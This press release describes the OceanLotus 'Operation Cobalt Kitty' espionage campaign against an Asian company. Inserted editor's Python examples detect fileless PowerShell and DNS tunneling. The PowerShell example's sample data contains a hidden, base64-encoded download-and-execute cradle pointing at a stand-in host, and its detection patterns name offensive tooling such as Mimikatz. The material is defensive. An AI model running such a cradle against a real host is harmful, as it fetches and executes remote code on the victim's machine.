Cybereason Discovers Large-scale Corporate Espionage Hacking Operation


Cybereason Uncovered a Massive and Wide Scale Advanced Cyber Attack Against a Prominent Corporation in Asia Being Carried Out by the Hacking Group OceanLotus. Details in Cybereason's Research Show the Cat and Mouse Game That Occurred Between the Company and the Hackers.

Cybereason, developers of the most effective Total Endpoint Protection Platform including EDR & NGAV, today released a report reviewing a massive cyber espionage advanced persistent threat (APT) named Operation Cobalt Kitty. The APT, carried out by the hacking group OceanLotus, targeted a global company based in Asia with the goal of stealing proprietary business information.

“Operation Cobalt Kitty provides a fascinating deep look at the specific tactics, tools and techniques used by OceanLotus to carry out a sophisticated, persistent, large scale attack against a global company. Interestingly, once the Cybereason technology was deployed across the customer’s environment, the attack quickly became a game of cat and mouse between our security analysts and hackers. In our report we share rarely seen details on this type of attack with the broader security industry,” said Assaf Dahan, director, advanced security services, Cybereason.

The infection of the company’s network was initiated by a spear-phishing email campaign targeted at senior management in the company.

Operation Cobalt Kitty comprised four attack phases observed by Cybereason's security analysts, who were called in to investigate after the company's IT department suspected that the network had been breached but was having a hard time tracing the source of the attack.

Phase One: Fileless operation (PowerShell and Cobalt Strike payloads)
Based on the forensic evidence collected from the victim environment, the original attack began about a year before Cybereason was deployed in the environment. During that phase, the threat actor operated a fileless, PowerShell-based infrastructure, using customized PowerShell payloads taken from known offensive frameworks such as Cobalt Strike, PowerSploit and Nishang.
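A fileless PowerShell infrastructure of the kind described above leaves little on disk, so the practical detection surface is PowerShell script-block logging (Windows event 4104). The following is an added example from the editor, not code from Cybereason or from the report: a small triage script that runs a handful of defender-side rules over script-block text, decodes any -EncodedCommand payload (PowerShell encodes it as base64 over UTF-16LE) and re-applies the rules to the decoded content. The log lines and the URL example.invalid are constructed for the example; the rule names are the editor's own.

```python
import base64
import binascii
import re

# Defender-side indicators commonly associated with fileless PowerShell tradecraft.
# Rule names are the editor's own; PowerSploit and Nishang are named in the report above.
RULES = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "noprofile_or_bypass": re.compile(r"-(?:nop|noprofile)\b|-(?:ep|executionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "known_framework": re.compile(r"PowerSploit|Nishang|Cobalt ?Strike|Invoke-Mimikatz", re.I),
}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    match = ENCODED.search(text)
    if not match:
        return None
    try:
        # PowerShell base64-encodes the UTF-16LE bytes of the command.
        return base64.b64decode(match.group(1)).decode("utf-16le", errors="ignore")
    except (binascii.Error, ValueError):
        return None


def analyze(script_block):
    """Return the list of rule names that fire on one script-block text."""
    hits = []
    decoded = decode_encoded_command(script_block)
    if decoded is not None:
        hits.append("encoded_command")
    for name, pattern in RULES.items():
        if pattern.search(script_block) or (decoded and pattern.search(decoded)):
            hits.append(name)
    return hits


def triage(script_blocks, min_hits=2):
    """Return (text, hits) for every block with at least min_hits rule hits.

    A single hit (e.g. a download cradle in an admin script) is common noise;
    stacking several indicators on one block is what warrants analyst attention.
    """
    return [(sb, h) for sb in script_blocks for h in [analyze(sb)] if len(h) >= min_hits]


# Constructed sample script-block texts (not real log data from the report).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED_SAMPLE = base64.b64encode(_CRADLE.encode("utf-16le")).decode()
SAMPLE_BLOCKS = [
    "Get-ChildItem C:\\Users",
    "powershell.exe -NoP -W Hidden -Enc " + ENCODED_SAMPLE,
    _CRADLE,
    "Write-Host 'hello'",
]

if __name__ == "__main__":
    for text, hits in triage(SAMPLE_BLOCKS):
        print(", ".join(hits), "<-", text[:70])
```

The decode step matters more than the pattern list: an encoded launcher shows none of the cradle keywords in the raw event text, so a rule set that does not decode first misses exactly the fileless case the report describes.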

Phase Two: Using DLL hijacking and DNS tunneling
During the second phase of the attack, the attackers introduced two stealthy backdoors that they attempted to deploy on selected targets. The introduction of the backdoors was a key turning point in the investigation, since it demonstrated the threat actor's resourcefulness and skill set.

At the time of the attack, these backdoors were undetected and undocumented by any security vendor. Kaspersky researchers have since identified a variant of one of them as Backdoor.Win32.Denis.
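The DNS tunneling named in this phase's heading is usually visible in resolver logs long before the backdoor binary is identified, because tunneled data has to be packed into subdomain labels. The following is an added example from the editor, not code from the report: a heuristic that groups queries by parent domain and flags domains that receive many distinct, long, high-entropy subdomains. The query log is constructed for the example, and the parent-domain split (last two labels) is a deliberate simplification that a production version would replace with a public-suffix list.

```python
import hashlib
import math
from collections import Counter, defaultdict


def shannon_entropy(text):
    """Bits of entropy per character of a string (0.0 for the empty string)."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Split a query name into (parent domain, subdomain part).

    Simplification: the parent is taken as the last two labels, which is wrong
    for suffixes such as co.uk; use a public-suffix list in real deployments.
    """
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return None, None
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def profile_domains(queries):
    """Collect per-parent-domain subdomain statistics from a list of query names."""
    stats = defaultdict(lambda: {"subdomains": set(), "lengths": [], "entropies": []})
    for qname in queries:
        parent, sub = split_name(qname)
        if parent is None:
            continue
        entry = stats[parent]
        entry["subdomains"].add(sub)
        entry["lengths"].append(len(sub))
        entry["entropies"].append(shannon_entropy(sub.replace(".", "")))
    return stats


def suspicious_domains(queries, min_unique=10, min_len=30, min_entropy=3.0):
    """Return parent domains whose subdomain traffic looks like a data channel.

    Thresholds are illustrative: hex-encoded data approaches 4 bits/char and
    base32/base64 payloads exceed that, while ordinary hostnames sit well below.
    """
    flagged = {}
    for parent, entry in profile_domains(queries).items():
        unique = len(entry["subdomains"])
        mean_len = sum(entry["lengths"]) / len(entry["lengths"])
        mean_ent = sum(entry["entropies"]) / len(entry["entropies"])
        if unique >= min_unique and mean_len >= min_len and mean_ent >= min_entropy:
            flagged[parent] = {
                "unique_subdomains": unique,
                "mean_subdomain_len": round(mean_len, 1),
                "mean_entropy": round(mean_ent, 2),
            }
    return flagged


# Constructed query log: ordinary lookups plus 12 hex-chunk subdomains under
# example.invalid that imitate data being carried in label text.
SAMPLE_QUERIES = ["www.example.com", "mail.example.com", "api.example.com"] * 5
for _i in range(12):
    _digest = hashlib.sha256(f"chunk-{_i}".encode()).hexdigest()
    SAMPLE_QUERIES.append(f"{_digest[:32]}.{_digest[32:48]}.c.example.invalid")

if __name__ == "__main__":
    for domain, info in suspicious_domains(SAMPLE_QUERIES).items():
        print(domain, info)
```

Counting distinct subdomains per parent is what separates a tunnel from a busy CDN: CDN hostnames are long but repeat, whereas a tunnel must keep changing the label to move new data.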

Phase Three: Introduction of a Novel Outlook Back Door and Lateral Movement Spree
In the third phase of the operation, the attackers harvested credentials stored on the compromised machines, moved laterally and infected new machines. They also introduced a stealthy technique for communicating with their servers and exfiltrating data through Microsoft Outlook. In a relentless attempt to remain undetected, the attackers devised an email-based C2 channel, which is very hard to detect because its traffic blends in with ordinary mail flow. They installed a backdoor macro in Microsoft Outlook that enabled them to execute commands, deploy their tools and steal valuable data from the compromised machines.

Phase Four: New Arsenal and Attempt to Restore PowerShell Infrastructure
After a four-week lull with no apparent malicious activity, the attackers returned and introduced new and improved tools aimed at bypassing the security mitigations that the company's IT team had implemented. These tools and methods mainly allowed them to bypass the PowerShell execution restrictions and the password-dumping mitigations.

Cybereason also uncovered a compromised server that the attackers used as their main attacking machine. They stored their arsenal in a network share on that server, which made it easier to spread their tools to other machines on the network.

Cybereason has also been the recipient of many industry awards and is regularly recognized by leading news organizations and outlets for outstanding product innovation.

Significant Awards
JMP Securities Super 60 Company to Watch
2017 EY Entrepreneur Semi-finalist Lior Div, CEO
2017 CRN Security 100: ‘20 Coolest Endpoint Security Companies’
‘Best Places to Work 2016’, Boston Business Journal
2017 Built in Boston 50 to Watch List (the only security company on the list)
2017 Cyber Excellence Awards ‘Most Innovative Cybersecurity Company’
2017 Cyber Defense Magazine Award for ‘Cutting Edge Endpoint Security Solution’
2016 EY Entrepreneur of Year Finalist Lior Div, CEO

About Cybereason
Cybereason is the leader in endpoint protection, offering endpoint detection and response, next-generation antivirus, and managed monitoring services. Founded by elite intelligence professionals born and bred in offense-first hunting, Cybereason gives enterprises the upper hand over cyber adversaries. The Cybereason platform is powered by a custom-built in-memory graph, the only truly automated hunting engine anywhere. It detects behavioral patterns across every endpoint and surfaces malicious operations in an exceptionally user-friendly interface. Cybereason is privately held and headquartered in Boston with offices in London, Tel Aviv, and Tokyo.

For more information, please visit:


Media Contact:
Bill Keeler
Director, Public Relations
(929) 259-3261
